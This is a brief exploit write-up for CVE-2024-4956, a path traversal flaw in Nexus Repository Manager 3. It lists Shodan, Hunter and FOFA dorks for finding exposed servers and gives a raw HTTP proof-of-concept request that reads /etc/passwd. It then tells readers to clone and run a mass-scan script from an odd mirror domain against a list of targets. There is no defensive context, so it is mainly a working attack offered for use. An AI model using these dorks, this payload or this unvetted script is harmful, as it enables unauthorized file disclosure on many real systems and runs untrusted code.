# # CVE-2024-4956 : Nexus Repository Manager 3
Dork:
-
Shodan:http.html:"Nexus Repository"
-
Hunter:product.name="Nexus Repository"
-
FOFA:app="Nexus-Repository-Manager"
Poc :
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: localhost:8081
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Or you can use this python script for multi scan :
!Put your targets in targets.txt
git clone https://github.com/GoatSecurity/CVE-2024-4956.git
cd CVE-2024-4956
pip install -r requirements.txt
python scan.py